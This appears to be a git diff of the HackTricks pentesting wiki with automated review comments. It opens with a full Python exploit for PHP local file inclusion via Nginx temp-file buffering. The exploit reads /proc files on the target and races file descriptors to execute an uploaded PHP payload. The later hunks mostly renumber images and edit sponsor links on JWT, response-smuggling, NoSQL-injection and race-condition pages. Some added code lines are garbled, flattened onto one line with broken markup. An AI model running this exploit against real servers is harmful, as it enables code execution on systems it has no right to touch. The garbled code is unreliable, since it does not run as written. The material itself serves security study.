params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'
```
-...
-php_admin_value[session.upload_progress.enabled] = 0
-php_admin_value[file_uploads] = 0
-...
+ requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
+except:
+ pass
```
-* Setup / hardening:
+def send\_payload\_worker(requests\_session): while True: send\_payload(requests\_session)
-```bash
-...
-chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
-chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
-...
-```
+def send\_payload\_multiprocess(requests\_session): # Use all CPUs to send the payload as request body for Nginx for \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=send\_payload\_worker, args=(requests\_session,)) p.start()
-Luckily PHP is currently often deployed via PHP-FPM and Nginx. Nginx offers an easily-overlooked [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) feature which will write temporary files if the client body (not limited to post) is bigger than a certain threshold.
+def generate\_random\_path\_prefix(nginx\_pids): # This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/\/cwd/proc/\/root/proc/\/root path = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path
-This feature allows LFIs to be exploited without any other way of creating files, if Nginx runs as the same user as PHP (very commonly done as www-data).
+def read\_file(requests\_session, nginx\_pid, fd, nginx\_pids): nginx\_pid\_list = list(nginx\_pids) while True: path = generate\_random\_path\_prefix(nginx\_pid\_list) path += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={path}").text except: continue # Flags are formatted as hxp{} if "hxp" in d: print("Found flag! ") print(d)
-Relevant Nginx code:
+def read\_file\_worker(requests\_session, nginx\_pid, nginx\_pids): # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range for fd in range(10, 45): thread = threading.Thread(target = read\_file, args = (requests\_session, nginx\_pid, fd, nginx\_pids)) thread.start()
-```c
-ngx_fd_t
-ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
-{
- ngx_fd_t fd;
+def read\_file\_multiprocess(requests\_session, nginx\_pids): for nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=read\_file\_worker, args=(requests\_session, nginx\_pid, nginx\_pids)) p.start()
- fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
- access ? access : 0600);
+if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\_session = create\_requests\_session() print('\[DEBUG] Getting Nginx pids') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pids: {nginx\_pids}') print('\[DEBUG] Starting payload sending') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] Starting fd readers') read\_file\_multiprocess(requests\_session, nginx\_pids)
- if (fd != -1 && !persistent) {
- (void) unlink((const char *) name);
- }
-
- return fd;
-}
-```
-
-It's visible that **tempfile is unlinked immediately** after being opened by Nginx. Luckily **procfs can be used to still obtain a reference** to the deleted file via a race:
-
-```
-...
-/proc/34/fd:
-total 0
-lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
-lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
-lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
-lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
-lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
-lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
-lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
-lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
-...
-```
-
-Note: One cannot directly include `/proc/34/fd/15` in this example as PHP's `include` function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)` which doesn't exist in in the filesystem. This minor restriction can luckily be bypassed by some indirection like: `/proc/self/fd/34/../../../34/fd/15` which will finally execute the content of the deleted `/var/lib/nginx/body/0000001368` file.
-
-## Full Exploit
-
-```python
-#!/usr/bin/env python3
-import sys, threading, requests
-
-# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
-# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details
-
-URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'
-
-# find nginx worker processes
-r = requests.get(URL, params={
- 'file': '/proc/cpuinfo'
-})
-cpus = r.text.count('processor')
-
-r = requests.get(URL, params={
- 'file': '/proc/sys/kernel/pid_max'
-})
-pid_max = int(r.text)
-print(f'[*] cpus: {cpus}; pid_max: {pid_max}')
-
-nginx_workers = []
-for pid in range(pid_max):
- r = requests.get(URL, params={
- 'file': f'/proc/{pid}/cmdline'
- })
-
- if b'nginx: worker process' in r.content:
- print(f'[*] nginx worker found: {pid}')
-
- nginx_workers.append(pid)
- if len(nginx_workers) >= cpus:
- break
-
-done = False
-
-# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
-def uploader():
- print('[+] starting uploader')
- while not done:
- requests.get(URL, data=' //'
- requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
- except:
- pass
-
-def send_payload_worker(requests_session):
- while True:
- send_payload(requests_session)
-
-def send_payload_multiprocess(requests_session):
- # Use all CPUs to send the payload as request body for Nginx
- for _ in range(multiprocessing.cpu_count()):
- p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
- p.start()
-
-def generate_random_path_prefix(nginx_pids):
- # This method creates a path from random amount of ProcFS path components. A generated path will look like /proc//cwd/proc//root/proc//root
- path = ""
- component_num = random.randint(0, 10)
- for _ in range(component_num):
- pid = random.choice(nginx_pids)
- if random.randint(0, 1) == 0:
- path += f"/proc/{pid}/cwd"
- else:
- path += f"/proc/{pid}/root"
- return path
-
-def read_file(requests_session, nginx_pid, fd, nginx_pids):
- nginx_pid_list = list(nginx_pids)
- while True:
- path = generate_random_path_prefix(nginx_pid_list)
- path += f"/proc/{nginx_pid}/fd/{fd}"
- try:
- d = requests_session.get(SERVER + f"/?action=include&file={path}").text
- except:
- continue
- # Flags are formatted as hxp{}
- if "hxp" in d:
- print("Found flag! ")
- print(d)
-
-def read_file_worker(requests_session, nginx_pid, nginx_pids):
- # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
- for fd in range(10, 45):
- thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
- thread.start()
-
-def read_file_multiprocess(requests_session, nginx_pids):
- for nginx_pid in nginx_pids:
- p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
- p.start()
-
-if __name__ == "__main__":
- print('[DEBUG] Creating requests session')
- requests_session = create_requests_session()
- print('[DEBUG] Getting Nginx pids')
- nginx_pids = get_nginx_pids(requests_session)
- print(f'[DEBUG] Nginx pids: {nginx_pids}')
- print('[DEBUG] Starting payload sending')
- send_payload_multiprocess(requests_session)
- print('[DEBUG] Starting fd readers')
- read_file_multiprocess(requests_session, nginx_pids)
```
## Labs
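Review bot: The two added lines at the top of this hunk are not valid Python. `read_file_multiprocess` and the entry-point guard are each collapsed onto a single line, the underscores are backslash-escaped, and the guard reads `if **name** == "**main**":` because `__name__` and `__main__` were turned into bold markup. The removed lines further down hold the same two pieces correctly indented inside the fenced block, so keep that fenced form instead of the flattened text. The hunk also deletes the paragraph explaining that the tempfile is unlinked right after it is opened and the note on why `/proc/34/fd/15` cannot be included directly; if that removal is intended, the commit message should say so.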
@@ -318,7 +80,7 @@ Their primary goal of WhiteIntel is to combat account takeovers and ransomware a
You can check their website and try their engine for **free** at:
-{% embed url="https://whiteintel.io" %}
+
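Review bot: Removing the `{% embed url="https://whiteintel.io" %}` line leaves the sentence above it ending in "for **free** at:" with nothing after the colon. Keep the embed, as the other WhiteIntel blocks in this patch do, or replace it with a plain link so the sentence still points somewhere.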
@@ -332,4 +94,5 @@ Other ways to support HackTricks:
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
\ No newline at end of file
+
+```
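Review bot: The last added line is a bare code fence placed after the "Share your hacking tricks" bullet, where the visible context shows no open code block. If it is meant to close a fence left open earlier in the file, repair the block at the point where it was broken; otherwise drop the line, since a lone fence at end of file opens an unterminated code block.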
diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md
index 071a58d29..ce64766b6 100644
--- a/pentesting-web/file-upload/README.md
+++ b/pentesting-web/file-upload/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -118,7 +118,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
-![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../.gitbook/assets/image (1044).png>)
+![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../.gitbook/assets/image (1047).png>)
## **uWSGI RCE**
@@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
* [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
* [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
index 891259401..4d7346a05 100644
--- a/pentesting-web/hacking-jwt-json-web-tokens.md
+++ b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -35,7 +35,7 @@ python3 jwt_tool.py -M at \
If you are lucky the tool will find some case where the web application is incorrectly checking the JWT:
-![](<../.gitbook/assets/image (932).png>)
+![](<../.gitbook/assets/image (935).png>)
Then, you can search the request in your proxy or dump the used JWT for that request using jwt\_ tool:
@@ -189,7 +189,7 @@ openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
Then you can use for example [**jwt.io**](https://jwt.io) to create the new JWT with the **created public and private keys and pointing the parameter x5u to the certificate .crt created.**
-![](<../.gitbook/assets/image (953).png>)
+![](<../.gitbook/assets/image (956).png>)
You can also abuse both of these vulns **for SSRFs**.
@@ -197,7 +197,7 @@ You can also abuse both of these vulns **for SSRFs**.
This parameter may contain the **certificate in base64**:
-![](<../.gitbook/assets/image (1116).png>)
+![](<../.gitbook/assets/image (1119).png>)
If the attacker **generates a self-signed certificate** and creates a forged token using the corresponding private key and replace the "x5c" parameter’s value with the newly generatedcertificate and modifies the other parameters, namely n, e and x5t then essentially the forgedtoken would get accepted by the server.
@@ -210,7 +210,7 @@ openssl x509 -in attacker.crt -text
If the JWT has embedded a public key like in the following scenario:
-![](<../.gitbook/assets/image (619).png>)
+![](<../.gitbook/assets/image (624).png>)
Using the following nodejs script it's possible to generate a public key from that data:
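Review bot: `image (619).png` becomes `image (624).png` here, a shift of 5, while every other reference renumbered in this file shifts by 3 (932 to 935, 953 to 956, 1116 to 1119). Please confirm that `image (624).png` is the embedded-public-key screenshot this paragraph introduces, since the files under `.gitbook/assets` are also changed by this patch and a wrong index would silently show an unrelated picture.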
@@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
{% embed url="https://github.com/ticarpi/jwt_tool" %}
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/hacking-with-cookies/README.md b/pentesting-web/hacking-with-cookies/README.md
index 14ba363ca..bb057e489 100644
--- a/pentesting-web/hacking-with-cookies/README.md
+++ b/pentesting-web/hacking-with-cookies/README.md
@@ -111,11 +111,11 @@ It is important to note that cookies prefixed with `__Host-` are not allowed to
So, one of the protection of `__Host-` prefixed cookies is to prevent them from being overwritten from subdomains. Preventing for example [**Cookie Tossing attacks**](cookie-tossing.md). In the talk [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) it's presented that it was possible to set \_\_HOST- prefixed cookies from subdomain, by tricking the parser, for example, adding "=" at the beggining or at the beginig and the end...:
-
+
Or in PHP it was possible to add **other characters at the beginning** of the cookie name that were going to be **replaced by underscore** characters, allowing to overwrite `__HOST-` cookies:
-
+
## Cookies Attacks
diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md
index 90619b5f4..8240edddf 100644
--- a/pentesting-web/http-response-smuggling-desync.md
+++ b/pentesting-web/http-response-smuggling-desync.md
@@ -30,7 +30,7 @@ HTTP/1.1 allows to ask for **different resources without needing to wait for pre
However, there is a problem desynchronising the responses queue. If an attacker send a HTTP Response smuggling attack and the responses to the **initial request and the smuggled one are responded immediately**, the smuggled response won't be inserted inside the queue of the victim response but will **just be discarded as an error**.
-![](<../.gitbook/assets/image (630).png>)
+![](<../.gitbook/assets/image (633).png>)
Therefore, it's needed that the **smuggled** **request** **takes more time to be processed** inside the back-end server. Therefore, by the time the smuggled request is processed, the communication with the attacker will be over.
@@ -38,9 +38,9 @@ If in this specific situation a **victim has sent a request** and the **smuggled
Moreover, is the **attacker then perform a request** and the **legitimate response** to the **victim** request is **answered** **before** the attackers request. The **response to the victim is going to be sent to the attacker**, **stealing** the response to the victim (which can contains for example the header **Set-Cookie**).
-![](<../.gitbook/assets/image (1017).png>)
+![](<../.gitbook/assets/image (1020).png>)
-![](<../.gitbook/assets/image (716).png>)
+![](<../.gitbook/assets/image (719).png>)
### Multiple Nested Injections
@@ -64,11 +64,11 @@ As with HTTP Request Smuggling known payloads, you can **steal the victims reque
First, the attacker send a payload containing a **final POST request with the reflected parameter** at the end and a large Content-Length
-![](<../.gitbook/assets/image (1050).png>)
+![](<../.gitbook/assets/image (1053).png>)
Then, once the **initial request** (blue) was **processed** and **while** the **sleepy** one is being processed (yellow) the **next request that arrives from a victim** is going to be **appended in the queue just after the reflected parameter**:
-![](<../.gitbook/assets/image (791).png>)
+![](<../.gitbook/assets/image (794).png>)
Then, the **victim** will **receive** the **response to the sleepy** request and if in the meantime the **attacker** **sent** **another** **request**, the **response from the reflected content request will be sent to him**.
@@ -82,21 +82,21 @@ There are interesting requests like **HEAD** request that are specified to not h
Therefore, if an attacker **injects** a **HEAD** request, like in this images:
-![](<../.gitbook/assets/image (1104).png>)
+![](<../.gitbook/assets/image (1107).png>)
Then, **once the blue one is responded to the attacker**, the next victims request is going to be introduced in the queue:
-![](<../.gitbook/assets/image (996).png>)
+![](<../.gitbook/assets/image (999).png>)
Then, the **victim** will **receive** the **response** from the **HEAD** request, which is **going to contain a Content-Length but no content at all**. Therefore, the proxy **won't send this response** to the victim, but will **wait** for some **content**, which actually is going to be **response to the yellow request** (also injected by the attacker):
-![](<../.gitbook/assets/image (732).png>)
+![](<../.gitbook/assets/image (735).png>)
### Content Confusion
Following the previous example, knowing that you can **control the body** of the request whose response is going to receive the victim and that a **HEAD** **response** usually contains in its headers the **Content-Type and the Content-Length**, you can **send a request like the following** one to **cause XSS** in the victim without the page being vulnerable to XSS:
-![](<../.gitbook/assets/image (685).png>)
+![](<../.gitbook/assets/image (688).png>)
### Cache Poisoning
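Review bot: Every image in this hunk keeps empty alt text (`![](...)`), yet the prose around them depends on the pictures: "once the blue one is responded" and "response to the yellow request" only make sense with the diagram in view. While these lines are being touched, add alt text that says which request is which, so the explanation survives a broken or misnumbered image reference.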
@@ -104,11 +104,11 @@ Abusing the previously commented response desynchronisation Content Confusion at
Malicious request containing the XSS payload:
-![](<../.gitbook/assets/image (611).png>)
+![](<../.gitbook/assets/image (614).png>)
Malicious response to the victim that contains the header that indicates to the cache to store the response:
-![](<../.gitbook/assets/image (563).png>)
+![](<../.gitbook/assets/image (566).png>)
{% hint style="warning" %}
Note that in this case if the **"victim" is the attacker** he can now perform **cache poisoning in arbitrary URLs** as he can **control the URL that is going to be cached** with the malicious response.
@@ -118,7 +118,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
-![](<../.gitbook/assets/image (988).png>)
+![](<../.gitbook/assets/image (991).png>)
### Response Splitting
@@ -128,15 +128,15 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl
He will send a **exploit** like:
-![](<../.gitbook/assets/image (908).png>)
+![](<../.gitbook/assets/image (911).png>)
After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**:
-![](<../.gitbook/assets/image (734).png>)
+![](<../.gitbook/assets/image (737).png>)
The victim will receive as response the **HEAD response + the content of the second request response (containing part of the reflected data):**
-![](<../.gitbook/assets/image (353).png>)
+![](<../.gitbook/assets/image (356).png>)
However, note how the **reflected data had a size according to the Content-Length** of the **HEAD** response that **generated a valid HTTP response in the response queue**.
diff --git a/pentesting-web/ldap-injection.md b/pentesting-web/ldap-injection.md
index b264c0e94..d8bb6c987 100644
--- a/pentesting-web/ldap-injection.md
+++ b/pentesting-web/ldap-injection.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md
index 3e32eed13..66de0634e 100644
--- a/pentesting-web/nosql-injection.md
+++ b/pentesting-web/nosql-injection.md
@@ -1,12 +1,12 @@
# NoSQL injection
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
@@ -118,7 +118,7 @@ Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cock
"user":{"$func": "var_dump"}
```
-![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit\_auth\_check\_10.png](<../.gitbook/assets/image (930).png>)
+![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit\_auth\_check\_10.png](<../.gitbook/assets/image (933).png>)
### Get info from different collection
@@ -145,13 +145,13 @@ It's possible to use [**$lookup**](https://www.mongodb.com/docs/manual/reference
]
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
## MongoDB Payloads
@@ -295,10 +295,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md
index bd35b55a5..8c605ae3f 100644
--- a/pentesting-web/oauth-to-account-takeover.md
+++ b/pentesting-web/oauth-to-account-takeover.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -226,7 +226,7 @@ If the platform you are testing is an OAuth provider [**read this to test for po
* [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md
index 59e546848..6246168b0 100644
--- a/pentesting-web/parameter-pollution.md
+++ b/pentesting-web/parameter-pollution.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -70,7 +70,7 @@ The way web technologies handle duplicate HTTP parameters varies, affecting thei
* [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
* [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/pentesting-web/phone-number-injections.md b/pentesting-web/phone-number-injections.md
index c6d722ca8..3f1885197 100644
--- a/pentesting-web/phone-number-injections.md
+++ b/pentesting-web/phone-number-injections.md
@@ -16,13 +16,13 @@ Other ways to support HackTricks:
It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:
-
+
-
+
**OTP Bypass / Bruteforce** would work like this:
-
+
## References
diff --git a/pentesting-web/postmessage-vulnerabilities/README.md b/pentesting-web/postmessage-vulnerabilities/README.md
index ee99e66af..941197a47 100644
--- a/pentesting-web/postmessage-vulnerabilities/README.md
+++ b/pentesting-web/postmessage-vulnerabilities/README.md
@@ -18,7 +18,7 @@ Other ways to support HackTricks:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -28,7 +28,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Send **PostMessage**
@@ -111,7 +111,7 @@ In order to **find event listeners** in the current page you can:
* **Go to** _Elements --> Event Listeners_ in the developer tools of the browser
-![](<../../.gitbook/assets/image (393).png>)
+![](<../../.gitbook/assets/image (396).png>)
* Use a **browser extension** like [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) or [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). This browser extensions will **intercept all the messages** and show them to you.
@@ -248,7 +248,7 @@ For **more information**:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
diff --git a/pentesting-web/proxy-waf-protections-bypass.md b/pentesting-web/proxy-waf-protections-bypass.md
index 259fd6f8e..66e0f3829 100644
--- a/pentesting-web/proxy-waf-protections-bypass.md
+++ b/pentesting-web/proxy-waf-protections-bypass.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -127,7 +127,7 @@ It was possible to bypass AWS WAF because it wouldn't understand that the next l
* [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md
index df4a5233d..2cce89925 100644
--- a/pentesting-web/race-condition.md
+++ b/pentesting-web/race-condition.md
@@ -1,12 +1,12 @@
# Race Condition
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
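Review bot: The text link on the added `Use [**Trickest**]` line carries `utm_term=trickest`, but the embed URL added a few lines below does not, and neither do the equivalent links added in nosql-injection.md and rate-limit-bypass.md. Pick one parameter set and apply it to every Trickest link; the same mismatch recurs in the second hunk of this file.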
@@ -62,7 +62,7 @@ If connection warming is ineffective, triggering web servers' rate or resource l
* **Tubo Intruder - HTTP2 single-packet attack (1 endpoint)**: You can send the request to **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), you can change in the request the value you want to brute force for **`%s`** like in `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` and then select the **`examples/race-single-packer-attack.py`** from the drop down:
-
+
If you are going to **send different values**, you could modify the code with this one that uses a wordlist from the clipboard:
@@ -115,7 +115,7 @@ Content-Length: 0
* For **delaying** the process **between** processing **one request and another** in a 2 substates steps, you could **add extra requests between** both requests.
* For a **multi-endpoint** RC you could start sending the **request** that **goes to the hidden state** and then **50 requests** just after it that **exploits the hidden state**.
-
+
* **Automated python script**: The goal of this script is to change the email of a user while continually verifying it until the verification token of the new email arrives to the last email (this is because in the code it was seeing a RC where it was possible to modify an email but have the verification sent to the old one because the variable indicating the email was already populated with the first one).\
When the word "objetivo" is found in the received emails we know we received the verification token of the changed email and we end the attack.
@@ -422,10 +422,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
diff --git a/pentesting-web/rate-limit-bypass.md b/pentesting-web/rate-limit-bypass.md
index bbdee7739..d534a8ea4 100644
--- a/pentesting-web/rate-limit-bypass.md
+++ b/pentesting-web/rate-limit-bypass.md
@@ -1,12 +1,12 @@
# Rate Limit Bypass
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
@@ -84,10 +84,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
